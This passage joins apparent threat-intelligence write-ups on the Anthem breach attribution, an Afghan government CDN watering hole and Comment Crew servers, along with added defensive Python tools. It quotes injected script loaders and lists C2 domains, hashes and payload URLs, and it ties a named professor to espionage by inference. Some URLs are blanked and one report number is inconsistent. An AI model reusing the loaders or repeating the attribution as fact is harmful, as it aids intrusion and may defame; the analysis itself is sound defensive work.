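WATCHED_BRANDS = ["wellpoint", "premera", "anthem"]

# Look-alike substitutions: the legitimate character maps to the sequences an
# attacker may use in its place. "l" -> "1" and "m" -> "nn" are the two cases
# seen in this write-up; the rest are common additions (assumption, not from
# the page).
SUBSTITUTIONS: Dict[str, List[str]] = {
    "l": ["1"],
    "m": ["nn", "rn"],
    "o": ["0"],
    "w": ["vv"],
}


def fold(label: str) -> str:
    """Map every look-alike sequence back to the character it imitates.

    Longer substitutes are folded first. Both the candidate label and the
    brand are folded with this same function, so a legitimate "rn" or "nn"
    inside a brand name cannot cause a false negative.
    """
    for real, fakes in SUBSTITUTIONS.items():
        for fake in sorted(fakes, key=len, reverse=True):
            label = label.replace(fake, real)
    return label


def registrable_label(domain: str) -> str:
    """Return the label left of the TLD, accepting defanged input like a[.]b.

    Public-suffix handling is deliberately naive (two-part suffixes such as
    co.uk are not special-cased).
    """
    domain = domain.lower().replace("[.]", ".").strip(".")
    parts = domain.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def check_domain(domain: str) -> Optional[Tuple[str, str]]:
    """Return (brand, label) when the domain's label imitates a watched brand."""
    label = registrable_label(domain)
    folded = fold(label)
    for brand in WATCHED_BRANDS:
        if folded == fold(brand) and label != brand:
            return brand, label
    return None


def scan(domains: List[str]) -> Dict[str, str]:
    """Map each suspicious domain in the feed to the brand it appears to imitate."""
    hits: Dict[str, str] = {}
    for domain in domains:
        result = check_domain(domain)
        if result is not None:
            hits[domain] = result[0]
    return hits


# Constructed sample feed: two of the write-up's defanged domains plus two benign ones.
SAMPLE_DOMAINS = [
    "extcitrix.we11point[.]com",
    "prennera[.]com",
    "wellpoint.com",
    "mail.example.org",
]

if __name__ == "__main__":
    for domain, brand in scan(SAMPLE_DOMAINS).items():
        print(f"{domain}: possible impersonation of {brand}")
```

Run against a daily feed of new registrations, a hit is a reason to pull Whois and passive DNS for the domain, exactly the pivot the analysis above performs by hand; it is not on its own evidence of malicious intent.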


VAE Inc. Themed Infrastructure & Signed Malware

Another powerful attribute of ThreatConnect is the ability for analysts to logically group items such as atomic indicators, related documents or signatures, all of which may include individualized custom context enrichments and associations. Over time, the ability to memorialize groupings of related or like activity allows analysts to quickly uncover non-obvious relationships within their private datasets. This is exactly what happened as we continued to investigate these incidents.

As industry analysts and media speculated Chinese APT involvement in the Anthem breach, our focus into the Derusbi / Sakula malware signed with the DTOPTOOLZ Co. digital signature shifted from the we11point[.]com incident to another cluster of activity that occurred later in May 2014. We immediately reviewed Incident 20140526B: vaeit APT, an incident that we initially shared to our Subscriber Community on September 29, 2014 after conducting retrospective analysis.

Just as was the case with the we11point[.]com and prennera[.]com incidents, the VAE, Inc. incident is also believed to be associated with Chinese APT espionage activity. In this case the adversary also used Derusbi / Sakula malware that was signed with the DTOPTOOLZ Co. digital signature and configured to communicate with faux infrastructure appearing to be masquerading as internal resources for the Department of Defense Contractor VAE, Inc. Additionally, in response to an inquiry from KrebsOnSecurity, VAE, Inc. would later confirm that it had indeed been a target of a failed spearphishing attempt in May 2014 which used the malicious faux VAE, Inc. themed domain.

The targeted incident relied upon the Sakula executable MD5: 230D8A7A60A07DF28A291B13DDF3351F, which had XOR 0x9A encoded C2 callbacks to the IP address 192.199.254[.]126 (registered to Wehostwebsites[.]com – “Tom Yu” of Baoan, Shenzhen City, Guangdong Province, China) as well as a hardcoded callback to sharepoint-vaeit[.]com. Passive DNS of the static C2 IP 192.199.254[.]126 revealed a single suspicious domain of interest – topsec2014[.]com. This domain had historic resolution around May 8, 2014, within a month of the first observed Sakula activity using the IP 192.199.254[.]126 as C2.

Using historic Whois, we discovered that topsec2014[.]com was initially registered by li2384826402@yahoo[.]com on May 6th, 2014. Although the li2384826402@yahoo[.]com registrant is likely a reseller given that it has been observed registering several thousands of other domains, the fact that it was used to register both the faux VAE, Inc. C2 infrastructure and the overlapping domain topsec2014[.]com within the same month suggests that there may be a relationship between the client of the reseller for the VAE, Inc. infrastructure and the client for topsec2014[.]com.


Just four minutes after the initial registration of topsec2014[.]com, the Whois records were updated from the initial registrant, Li Ning – li2384826402@yahoo[.]com, to TopSec China – TopSec_2014@163[.]com. This domain record has been unchanged since May 7th 2014. The we11point[.]com infrastructure, and by extension the faux VAE Inc. infrastructure, is associated with Cluster 2 of the ScanBox framework by PwC. The latest PwC update to ScanBox states that there are “links between the domain allegedly used in the Anthem hack ( to Cluster 2 through shared WHOIS details.”

OPM Themed Infrastructure

One notable pattern was how the domain Whois registration information for the VAE, Inc. themed infrastructure was quickly updated and obfuscated with pseudorandom 10 character email addresses and using the names of various comic book characters from the Iron Man franchise. This comic-themed naming convention has been previously documented by our friends at Crowdstrike in what they characterize as being associated with a Chinese APT group they have dubbed “Deep Panda”.

Leveraging our DomainTools partnership, we were able to correlate the outlier domain opm-learning[.]org. This domain was also purportedly registered by the Iron Man movie hero “Tony Stark” on July 28, 2014. This infrastructure naming convention suggests a possible Office of Personnel Management (OPM) theme. However, in this case we lacked any specific sample of malware to verify our initial suspicions that this infrastructure was operational. The possible OPM reference in the domain name is noteworthy considering it was revealed in July of 2014 that OPM had been compromised by a likely state-sponsored Chinese actor in mid-March of that year. The fact this domain was registered after the breach occurred suggests that OPM could be an ongoing direct target of Chinese state-sponsored cyber espionage activity.

Our attention then turned to the FBI Flash Report A-000049-MW that was publicly reported by Brian Krebs on February 6th, 2015. This FBI Flash Report was issued on January 27th, 2015, the same day an Anthem administrator detected suspicious activity according to an internal memo. This memo goes on to indicate that the FBI would not be party to the Anthem breach until they were notified on January 29th, 2015; based on these facts we assess with high confidence that it is very unlikely that the FBI Flash Report was directly related to the Anthem breach. Rather, we suspect that the FBI flash report likely references the USIS breach that was announced on August 6, 2014, or the previous OPM breach, considering the statement that the breach involved “compromised and stolen sensitive business information and Personally Identifiable Information (PII) from US commercial and government networks through cyber espionage.”

The malware referenced within the FBI Report is associated with a Derusbi backdoor subvariant named “InfoAdmin” / “Kakfum”; the FBI specifically references open source reporting on “Deep Panda” as being related to the malware observed in the attack. The malicious infrastructure highlighted in the report consists of the domains images.googlewebcache[.]com and smtp.outlookssl[.]com. Both of these domains were included with other related domains, all of which were shared on September 16th, 2013 to the ThreatConnect Subscriber Community in Incident 20130823C: Some.Trouble APT Domains, roughly a year and a half prior to the FBI Flash report.

It is important to mention that both the domains images.googlewebcache[.]com and smtp.outlookssl[.]com were also previously identified in an October 2014 PwC blog post as seen within Cluster 1 of the ScanBox framework, while the Sakula activity with we11point and VAEIT is contained within Cluster 2 of that report. This implies that the actor referenced within the FBI Flash report uses shared capabilities (in this case the ScanBox kit) with the Sakula / we11point actor.

Section Summary:

  • The Derusbi / Sakula malware seen in both the we11point[.]com and VAE Inc. campaigns was structurally the same and digitally signed with the DTOPTOOLZ signature.
  • The emerging theme is that this particular signature and family of malware is highly indicative of a particular Chinese APT activity.
  • Within this web of malicious infrastructure, there is an interesting overlap with the topsec2014[.]com domain and attack infrastructure.
  • ThreatConnect Research identified a domain opm-learning[.]org that had a similar superhero themed WHOIS registrant to the Sakula / VAE Inc. infrastructure. The possible OPM reference is noteworthy considering the Office of Personnel Management (OPM) was compromised in March 2014. Additionally, an FBI Flash Report 0000-49MW referenced indicators that were possibly associated with the USIS hack and a Derusbi variant called “Kakfum” / “InfoAdmin”. Both the FBI Flash infrastructure and the Sakula / VAE Inc. infrastructure are tied to the capability usage of the ScanBox framework, residing in Clusters 1 and 2 respectively.

Unveiling Song Yubo and Southeast University:

The Professor

We conducted open source research in pursuit of further information on the TopSec_2014@163[.]com email registrant. A keyword search returned several results for “topsec2014@163[.]com” in association with a number of academic institutions in Nanjing, China. Although the email address wasn’t an exact match to the topsec2014[.]com domain registrant (notice the absence of the underscore), such a similarity warranted further investigation.

We examined the links for any relevant intelligence, and discovered that nearly all of the search results led to pages that contained an announcement for an information security competition sponsored by the Southeast University-Topsec Information Security and Mobile Internet Technology Joint Research Center. This entity appears to be a joint research venture between the University and Chinese networking giant Beijing Topsec Network Security Technology Co., a.k.a. Beijing Topsec.


The announcements list a Professor “Song Yubo” as the point of contact for the event, and directs interested parties to his email address, topsec2014@163[.]com, for further questions.


According to his LinkedIn page, Song is a Teacher at the Southeast University, specifically interested in the field of telecommunications. Additionally, he is an avid researcher, and has published numerous academic papers on computer network exploitation on various e-journal publication sites, such as Google Scholar. Further, he lists skills such as “cryptography,” “penetration testing” and “computer network security,” etc. on his Research Gate profile.


As we continued to develop a profile on Professor Song, we began to have the sense that his interest in information security research strongly overlapped with that of someone who might be interested in or at least capable of conducting sophisticated cyber attacks. However, interests alone are not enough to warrant reasonable suspicion, so we had to do more digging.

Additionally, the soft link between TopSec_2014@163[.]com and topsec2014@163[.]com alone was not sufficient to make associations with any reasonable confidence, but as it turns out, Yubo has in fact been previously named as a person of interest in the context of offensive Chinese cyber activity.

The University

In March 2012, Northrop Grumman presented a commissioned report to Congress detailing Chinese cyber warfare capabilities. The report asserts with high confidence that both Song and the Information Security Research Center at Southeast University have received numerous state-sponsored research grants, and by extension, cooperated with the Government of China in conducting information security research and development (R&D). As stated on Southeast University’s own website, the main purpose of these grants is to develop technical acumen amongst its students by providing support for “state-owned scientific research institutions, state key enterprises, government agencies and People’s Liberation Army (PLA) units.”

Southeast University is one of only three Chinese academic institutes that receives funding from all five of the State grant programs. Song himself has also conducted his fair share of state-sponsored research, notably under the National Ministry of State Security 115 Program – a highly sensitive research grant to fund ambiguous information warfare R&D, almost certainly in support of PLA programs.

The Competition

As we can see, the evidence continued to stack up.  The real smoking gun, however, was when we began to notice a strong temporal overlap with the various stages of the TOPSEC Cup that Song and Beijing Topsec were organizing, and the registration dates of malicious infrastructure as well as the malware compilation dates.

Based upon the translated registration form that we obtained from Song Yubo’s personal Baidu document sharing account, open registration for the “TOPSEC Cup” began on May 4th, 2014 and would close on May 14th, 2014.

The details of the competition that were shared on the announcement are extremely ambiguous, and probably for good reason. The introductory paragraph mentions that the primary goal of the event is to facilitate the training and discovery of new talent, noting that exceptional participants would receive priority consideration for internships and jobs with Beijing Topsec.

The event itself was broken down into several distinct rounds of competition. Firstly, the preliminary round required all eligible registrants to attempt to remotely access and navigate through the network. Should a participating team perform exceptionally in the preliminary qualifying round, they would be invited to participate in the final round on-site in Nanjing.

In this final round, participants would be required to build their own “information systems and network environments.”  The announcement notes that the students must rely upon their own laptop and software tools to accomplish this task.  Further, the announcement notes that participants are prohibited from attacking the provided server as well as their competitors.

Section Summary:

  • Song Yubo and his research center at Southeast University appear to be central players in this narrative, as highlighted by their financial connections to the government of China, in particular the Ministry of State Security (MSS), China’s premier human intelligence agency.
  • If the MSS was involved, we can deduce that the Anthem hack could have been for the purposes of gathering sensitive information for follow-on HUMINT targeting via blackmail, asset recruitment or technical targeting operations against individuals at home.
  • Song’s use of the topsec email alias suggests a greater association with TOPSEC.
  • It seems as if the competition is almost certainly the cause for the topsec2014[.]com domain. What is very curious, however, is the initial registration by the reseller li2384826402@yahoo[.]com, which is a tactic seen within the confirmed malicious faux VAE Inc. infrastructure.
  • The overlap between the competition website and the static command and control infrastructure seen in the Derusbi / Sakula implant was likely an error made by the attackers.


Tianrongxin, a.k.a. Beijing Topsec Technology Co:

The Company

To enhance our open-source capabilities, we partnered up with Dr. James Mulvenon and his team of China experts at Defense Group, Inc. (DGI).  We shared with them everything that we knew at the time, walking through the technical details which led us all the way to Song Yubo and the competition announcement.  From there, they were able to uncover a wealth of very consequential background information on Beijing Topsec Technology Co (Beijing Topsec), the sponsoring organization for Song Yubo’s information security competition.

DGI’s research indicated that Beijing Topsec is one of the largest information security hardware providers in China. In 1996, they were the first Chinese company to break into the market with the release of China’s first indigenously-manufactured firewall. Since then, they have expanded their business to include a consulting practice focused on issues such as vulnerability mining, software code analysis, threat intelligence, and encryption R&D, amongst other things.

The company served as a core technical support unit for network security at the 2008 Olympic Games – an event which was tightly controlled by the state.  Additionally, Beijing Topsec is a known partner of the Chinese military. Since 2009, the company has possessed information publication credentials for military network procurement. Since 2013, they have been publicly recognized as the Chinese equivalent of a cleared defense contractor.

The links between Beijing Topsec and the Chinese government are fairly substantial, highlighted by long-standing partnerships with even the most shadowy elements of the Chinese military.

The Leaked Cable

A very compelling piece of evidence is found in the contents of a leaked 2009 diplomatic security cable from the Department of State, published by The Guardian.  The cable is a daily digest of Diplomatic Security alerts – essentially a situational awareness primer for State Department employees to inform them of new and existing threats.  In one section, the cable highlights that the Founder of Beijing Topsec, He Weidong, had openly talked about receiving directives from the PLA in an interview with China News Network.  In the interview, the founder quite curiously states that Topsec is less a commercial entity, but rather a research institute, and that the company received about half of its start-up capital directly from the PLA.  The cable further claims that Topsec actively recruits for the PLA cyber army.


It would also appear that Beijing Topsec not only has deep ties to state-run cyber activity, but also to the independent hacker community. Of note, the company hired the notorious hacker Lin Yong, a.k.a. “Lion” (of the Honker Union of China), in the early 2000s as a security service engineer and to conduct network training.

Section Summary:

  • It is not surprising that the Chinese government would be interested in partnering with a private organization such as Beijing Topsec for use as a front for state-sponsored activity.
  • The association between Southeast University and Beijing Topsec as manifested in the joint information security research center highlights the possibility of growing links between state-sponsored activity and academic institutions, particularly those that receive funding from the central government.
  • All in all, it would seem that China is pursuing a unified approach to cyber operations, relying on all unique facets of the workforce: academia, private industry, and independent hackers, as well as the PLA to achieve their strategic goals.


The Anthem breach exposes the insidious reality of modern Chinese cyber espionage as it continues its unrelenting strikes at the soft underbelly of the American way of life.  Moreover, it demonstrates the imposing yet increasingly common reality of conducting threat intelligence analysis without substantial threat intelligence to start with.  Fortunately for us, we were able to deduce informed answers to some of the outstanding questions to this breach by scrutinizing our archival data troves that are efficiently stored within our Threat Intelligence Platform and partner integrations.  In the field of cyber security, industry professionals must learn to play the long game in order to generate a proactive sense of situational awareness, allowing for greater efficiency and flexibility in mitigating future threats.

Additionally, this incident underscores the frustrating disparity of the industry when it comes to naming conventions. With so many threat actors and indicators floating around, it can be frustrating to keep track of all the disparate pieces of evidence, especially when countless naming conventions are applied. Without the use of a Threat Intelligence Platform to keep track of the flood of incoming threat data, this task would be extraordinarily time consuming at best and crippling at worst.

Moving forward, it is important to bear in mind that the adversary, regardless of country of origin, shall almost certainly leverage our every weakness against us.  Even something as seemingly innocuous as confusion over names can easily consume analytical bandwidth, creating a window of opportunity to strike.  We – that is security professionals, private industry and governments alike – must proactively harden our network defenses and hasten our incident responses as a united, synchronous entity.

We have shared details on Song Yubo and affiliated indicators within the ThreatConnect Common Community.  This share also includes the full-text DGI “BLUE HERON” research which provides greater insight into Song Yubo, Southeast University and Beijing Topsec.

All things considered, industry must learn to adopt a cooperative defense mindset in the hopes of rebuffing future attacks. The most resolute defense we have is each other, so be like ThreatConnect Research and start actively defending your own community from the next big breach. To get started, register for a free ThreatConnect account today by filling out the form below, and start sharing and analyzing your threat intelligence.


Operation Poisoned Helmand

In this day and age of interconnected cloud services and distributed content delivery networks (CDNs), it is important for both CDN service providers and security professionals alike to recognize and understand the risks that these systems can introduce within a modern enterprise. For organizations within both public and private sectors that leverage CDN platforms to dynamically deliver web content, it is important that the content is also routinely monitored. Otherwise, malicious third-party content can be loaded into a target organization’s website without their knowledge, delivering untold risks to unwitting visitors.

Afghan Government “Watering Hole”

The ThreatConnect Research Team recently observed a targeted cross-site scripting (XSS) “drive-by” attack that leveraged a single content delivery network resource to distribute a malicious Java applet via nearly all of the major official Government of Afghanistan websites. The compromised CDN resource in question is a JavaScript file hosted at [http:]//cdn.afghanistan[.]af/scripts/gop-script.js


The domain cdn.afghanistan[.]af is a legitimate CDN site used by the Afghan Ministry of Communications and IT (MCIT) to host web content that is displayed and used on many official websites.


The JavaScript URL ([http:]//cdn.afghanistan[.]af/scripts/gop-script.js) is called from numerous official Afghan Government websites, including the following:

  • [http:]//canberra.afghanistan[.]af/en (Afghan Embassy in Canberra, Australia)
  • [http:]//[.]af/fa (Herat Province Regional Government)
  • [http:]//[.]af/en (Ministry of Foreign Affairs)
  • [http:]//[.]af/en (Ministry of Commerce and Industries)
  • [http:]//[.]af/en (Ministry of Education)
  • [http:]//[.]af/en (Ministry of Finance)
  • [http:]//[.]af/fa (Ministry of Justice)
  • [http:]//[.]af/fa (Ministry of Women’s Affairs)
  • [http:]//[.]af/fa (Office of Administrative Affairs and Council of Ministers)

It is likely that this JavaScript URL itself is normally legitimate, but the attackers obtained access to the file and prepended the following malicious JavaScript calls to the beginning of the script:

document.write("<script src=></script>");
document.write("<script src=></script>");

Note that the websites would not need to be compromised individually for this attack to be delivered to visitors of the sites, because it is the backend CDN infrastructure that is serving up the malicious script.

Li Keqiang: A Harbinger of Targeted Exploitation?

Judging by the last modified timestamp on the HTTP response of gop-script.js, Tue, 16 Dec 2014 08:07:06 GMT, this malicious CDN compromise was very recent. In fact, it occurred on the very same day that China’s Prime Minister Li Keqiang met with Abdullah Abdullah, the Chief Executive Officer of Afghanistan, in Astana, Kazakhstan, where they discussed infrastructure development and bilateral cooperation issues.


Looking at the EXIF metadata of the image of Keqiang meeting with Abdullah that is hosted on the Chinese embassy website, we note a Tue, 16 December 2014 07:43:31 modify time as well as the[.]cn watermark in the bottom right-hand corner. This indicates that the image of Keqiang and Abdullah was likely taken and edited sometime prior to 07:43:31. While it is ambiguous as to which timezone the edits actually took place in (Kazakhstan or China), we assume the timestamp references GMT because the press release states “In the afternoon of December 15 local time…” If we assume the photograph and afternoon meeting took place sometime prior to 13:43 Alma-Ata standard time (+0600), this would closely correspond with a 07:43 GMT time stamp. The modification of gop-script.js by the attackers at 08:07:06 GMT likely tracks extremely close to the window of a few hours in which Keqiang met with Abdullah.


It is worth mentioning that a similar scenario occurred on June 20th when security researcher PhysicalDrive0 observed a malicious Java file hosted on the website of the Embassy of Greece in Beijing. At the time, a Chinese delegation led by Keqiang was visiting Greek Prime Minister Antonis Samaras in Athens. Security researcher R136a1 aka “thegoldenmessenger” released a follow-up blog with detailed analysis of the Greek embassy compromise.

While these two separate events are not directly related, additional research into the status of ministerial and official government websites on or around the dates of notable Chinese delegations and or bilateral meetings may yield additional patterns of interest.

Java Malware Overlap

Upon closer inspection of the prepended malicious JavaScript code, one will notice the similarity in the update.javaplug-in[.]com naming convention and URL structure to the C2 domain java-se[.]com found in the Palo Alto Networks blog post Attacks on East Asia using Google Code for Command and Control and associated with Operation Poisoned Hurricane. However, the malicious document.write driveby URLs listed above both result in 403 Forbidden errors as of December 18, 2014.

While the 403 Forbidden errors may seem like an analytic dead end, ThreatConnect Research also identified a malicious Java applet submission to VirusTotal that confirms the nature of this malicious activity. This Java applet, SHA1: 388E6F41462774268491D1F121F333618C6A2C9A, has no antivirus detections as of December 21st. The applet contains its malicious class file at the path “jre7u61windows/x86/Update.class”. This class file downloads and decodes an XOR 0xC8 encoded Windows PE executable payload from [http:]//[.]af/content/images/icon35.png, hosted on the official Afghan Ministry of Foreign Affairs site, which was also affected by the gop-script XSS.

Using historic context archived within ThreatConnect, ThreatConnect Research concluded that this Java applet is from the same source code as the applet SHA1: ADC162DD909283097E72FC50B7AB0E04AB8A2BCC, which was previously observed by ThreatConnect Research at the Operation Poisoned Hurricane related URL [http:]//[.]com/java.jar on August 15, 2014. This applet has the same class path, and downloads an XOR 0xFF encoded payload executable from the URL [https:]//[.]jp/js/dl/in.jpg. Additional indicators and context associated with this particular Java driveby activity can be found in the ThreatConnect Common Community Incident 20140815A: java-se APT Driveby (shared October 02, 2014).

The Windows PE Payload

The XOR 0xC8 encoded payload downloaded from [http:]//[.]af/content/images/icon35.png decodes into the Windows PE executable SHA1: 72D72DC1BBA4C5EBC3D6E02F7B446114A3C58EAB.
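Single-byte XOR appears twice in this write-up: obfuscating the C2 callbacks in the Sakula sample discussed earlier (key 0x9A) and disguising the PE payload served as icon35.png (keys 0xC8 and 0xFF in the two applets). The example below is added here and is not ThreatConnect's tooling; it shows how an analyst can recover such a key from a captured blob without knowing it in advance, by deriving it from the expected "MZ" DOS header and validating the PE signature, and how to pull NUL-separated strings out of an XOR-obfuscated config. The PE-shaped blob and the config strings are constructed placeholders (a TEST-NET address and a .invalid hostname), not the page's indicators.

```python
import struct
from typing import List, Optional


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def is_pe(data: bytes) -> bool:
    """True when data starts with a DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_pe_key(blob: bytes) -> Optional[int]:
    """Recover the single-byte XOR key protecting a PE, or None if blob is not one.

    Only one key can turn the first byte into 'M', so derive it from that byte
    and then insist that the rest of the header is consistent; the second
    check is what rejects random data and non-PE files.
    """
    if len(blob) < 2:
        return None
    key = blob[0] ^ 0x4D  # ord("M")
    return key if is_pe(xor_bytes(blob, key)) else None


def decode_strings(blob: bytes, key: int, min_len: int = 4) -> List[str]:
    """Decode an XOR-obfuscated config blob and return its NUL-terminated printable strings."""
    decoded = xor_bytes(blob, key)
    strings: List[str] = []
    for chunk in decoded.split(b"\x00"):
        if len(chunk) >= min_len and all(0x20 <= c < 0x7F for c in chunk):
            strings.append(chunk.decode("ascii"))
    return strings


def make_sample_pe() -> bytes:
    """Constructed PE-shaped header (not a real or runnable executable)."""
    header = bytearray(0x100)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x80)   # e_lfanew -> offset 0x80
    header[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<H", header, 0x84, 0x014C)  # IMAGE_FILE_MACHINE_I386
    return bytes(header)


SAMPLE_PE = make_sample_pe()
# What a captured "icon35.png"-style download would look like under key 0xC8.
ENCODED_PAYLOAD = xor_bytes(SAMPLE_PE, 0xC8)
# Constructed config strings (TEST-NET address, .invalid host) under key 0x9A.
ENCODED_CONFIG = xor_bytes(b"203.0.113.10\x00c2.example.invalid\x00\x01\x02", 0x9A)

if __name__ == "__main__":
    key = recover_pe_key(ENCODED_PAYLOAD)
    print(f"payload key: {key:#04x}" if key is not None else "not a XOR-encoded PE")
    print("config strings:", decode_strings(ENCODED_CONFIG, 0x9A))
```

The same header check is a cheap triage rule for proxy logs: a response whose Content-Type says image/png but whose body, under some single-byte key, carries a valid DOS/PE header is worth pulling for analysis.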

This executable is a self-extracting (SFX) Microsoft Cabinet executable that is digitally signed with a valid certificate from “OnAndOn Information System Co., Ltd.”, serial number “1F F7 D8 64 18 1C 55 5E 70 CF DD 3A 59 34 C4 7D”. This same certificate was also used to sign the Java applet that downloaded this malware.

This executable drops the following files:

  • SHA1: 2068260601D60F07829EE0CEDF5A9C636CDB1765 (dllhost.exe): legitimate Microsoft Debugging Tools for Windows executable; loads dbgeng.dll.
  • SHA1: E2D93ABC4C5EDE41CAF1C0D751A329B884D732A2 (dbgeng.dll): malicious DLL that loads into the above dllhost.exe, using a DLL sideloading technique similar to the one most commonly associated with the PlugX backdoor.
  • SHA1: 5C8683E3523C7FA81A0166D7D127616B06334E8D (Readme.txt): malicious encrypted backdoor binary blob loaded by dbgeng.dll.

This backdoor connects to the faux Oracle Java themed command and control (C2) domain oracle0876634.javaplug-in[.]com. Note that javaplug-in[.]com is the same root domain found in the compromised version of [http:]//cdn.afghanistan[.]af/scripts/gop-script.js as [http:]//update.javaplug-in[.]com/o/j.js, confirming that this Java malware is in fact directly associated with the Afghan MCIT CDN XSS compromise.

Full indicators of this activity and a YARA rule to detect the malware certificate can be found in the ThreatConnect Common Community under Incident 20141217A: Afghan Government Java Driveby and signature APT_OnAndOn_cert.yara.


As the US and NATO reduce their troop levels in Afghanistan, China is posturing to fill the gap of influence that the west is leaving behind. With plans to facilitate multilateral peace talks with the Taliban and establish major transportation projects which aim to bolster the Afghan economy, Beijing has been eyeing Afghanistan as part of its broader South Asian strategy.

By exploiting and co-opting Afghan network infrastructure that is used by multiple ministerial level websites, Chinese intelligence services would be able to widely distribute malicious payloads to a variety of global targets using Afghanistan’s government websites as a topical and trusted distribution platform, exploiting a single hidden entry point. This being a variant of a typical “watering-hole” attack, the attackers will most likely infect victims outside the Afghan government who happened to be browsing any one of the CDN client systems, specifically, partner states involved in the planned troop reduction.

It is important to consider that corporate enterprises are not immune to this tactic, and this is not just a technique that is used by APT threat actors. If an enterprise’s website leverages a CDN to speed up content delivery, unintended consequences must be anticipated. Fortunately, modern browsers now implement a security concept called “Content Security Policy”. As long as the server’s response headers are configured properly, third party content may be restricted to originating from a narrow whitelist.
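To make the Content Security Policy point concrete, here is an added example (not from the page or from ThreatConnect) that parses a CSP header value and decides whether a given script URL would be permitted, then compares a permissive policy with a restrictive one. It implements a simplified subset of CSP source matching (the keywords 'self' and 'none', scheme sources such as https:, and host sources with an optional leading wildcard); nonces, hashes and 'strict-dynamic' are not handled. The page origin, CDN host and attacker host are constructed placeholders.

```python
from typing import Dict, List, Optional
from urllib.parse import urlparse


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Parse a Content-Security-Policy header value into {directive: [source expressions]}."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def source_matches(source: str, script_url: str, page_origin: str) -> bool:
    """Simplified CSP source-expression matching (no nonces, hashes or 'strict-dynamic')."""
    url = urlparse(script_url)
    host = (url.hostname or "").lower()
    src = source.lower()
    if src == "*":
        return True
    if src == "'self'":
        page = urlparse(page_origin)
        return (url.scheme == page.scheme
                and host == (page.hostname or "").lower()
                and url.port == page.port)
    if src.startswith("'"):                     # 'none', 'unsafe-inline', ... never match a URL
        return False
    if src.endswith(":") and "/" not in src:    # scheme source such as "https:"
        return url.scheme == src[:-1]
    scheme, _, rest = src.partition("://") if "://" in src else ("", "", src)
    if scheme and url.scheme != scheme:
        return False
    hostpart = rest.split("/")[0].split(":")[0]
    if hostpart.startswith("*."):               # "*.example" matches any subdomain
        return host.endswith(hostpart[1:])
    return host == hostpart


def script_allowed(header: str, script_url: str, page_origin: str) -> bool:
    """Would a browser enforcing this policy load script_url on a page at page_origin?"""
    policy = parse_csp(header)
    sources: Optional[List[str]] = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return True  # no applicable directive: nothing is restricted
    return any(source_matches(s, script_url, page_origin) for s in sources)


# Constructed placeholders, not the page's hosts.
PAGE_ORIGIN = "https://www.ministry.example"
CDN_SCRIPT = "https://cdn.ministry.example/scripts/gop-script.js"
INJECTED_SCRIPT = "http://malicious.invalid/o/j.js"

# Weak: any origin may supply scripts, so injected loaders succeed.
WEAK_CSP = "default-src *; script-src * 'unsafe-inline'"
# Corrected: only the page's own origin and the organisation's CDN may supply scripts.
STRICT_CSP = "default-src 'self'; script-src 'self' https://cdn.ministry.example"

if __name__ == "__main__":
    for name, policy in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        print(name, "cdn:", script_allowed(policy, CDN_SCRIPT, PAGE_ORIGIN),
              "injected:", script_allowed(policy, INJECTED_SCRIPT, PAGE_ORIGIN))
```

A policy like the strict one above would have stopped the injected document.write loaders from fetching the javaplug-in[.]com scripts, since that host is not listed in script-src. It does nothing, however, about the tampered gop-script.js itself, which is served from the allowlisted CDN; that is why the content monitoring the article calls for remains necessary alongside the header.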

Just as attackers distribute malicious content to users en masse or CDN services distribute web content to users, security professionals must be able to quickly distribute actionable Threat Intelligence in formats readable by both humans and machines. ThreatConnect is the industry’s first comprehensive Threat Intelligence Platform that enables enterprises to orchestrate the aggregation of Threat Intelligence from multiple sources, use integrated analytics and a robust API that gives enterprises the control to action their own Threat Intelligence, in the cloud and on premises. Register for a free account now to view the Common Community shares and more.

Old Habits Die Hard: Iterative Intelligence & Comment Crew Activity

History is made when the notable details of past events are recorded and others can then learn from and study them. For example, you can go to any library and read about the Civil War. You can read about the many tactical skirmishes and battles. You can also learn about the outcomes of these tactical engagements, and how they influenced larger operational campaigns, where two primary belligerents executed against longer-term strategies. Many of these strategies influenced future warfare tactics and were iteratively improved upon, over time, through lessons learned. These improvements were achieved by dissecting the data points, and the successes as well as failures of those engagements, which had been recorded and made available to historians.

While not all-encompassing, there are notable cross-sections between the modern digital world and the conventional flesh and bone one. Today’s netDefense and threat intelligence professionals understand that at the “tactical fight” level. They understand and acknowledge the need for an organization to effectively memorialize and accumulate knowledge to successfully execute their jobs. Unfortunately, there are professionals within the security industry who only look at a threat from the vantage point of an assembly line worker. They mitigate each threat as it comes down the line and wait for the next one, never looking to the past in an effort to anticipate the future.

Fortunately, ThreatConnect users are enabled to aggregate their existing private threat intelligence, analyze it against other data services and security events, and ultimately to act on the information. In the following example, we will highlight how Comment Crew (aka APT1) has recently operationalized legacy infrastructure and is using it to target a variety of victims. As cliché as it may be, even in cyber, history repeats itself.

Executive Summary:

In mid-March 2014, the ThreatConnect Research Team identified an active Comment Crew server that was hosting malicious executable malware implants made to appear as legitimate document files (within SFX RAR executables). These malware implants dropped decoy documents that included recent news articles and reports relevant to current geopolitical events, including the circumstances surrounding missing Malaysia Airlines flight MH370, and recent European economic and Trans-Atlantic trade related news.

The Comment Crew infrastructure naming convention similarities and malware attributes highlight a likely overlap with the Siesta Campaign. These indicators were shared within premium ThreatConnect industry and subscriber communities on the 17th of March within Incident 20140314B: Comment Crew HFS APT Campaign.

The command and control (C2) server 184.82.120[.]136 (Scranton, PA) recently hosted malicious content via TCP/8080 from the domains outlined in the graphic below:


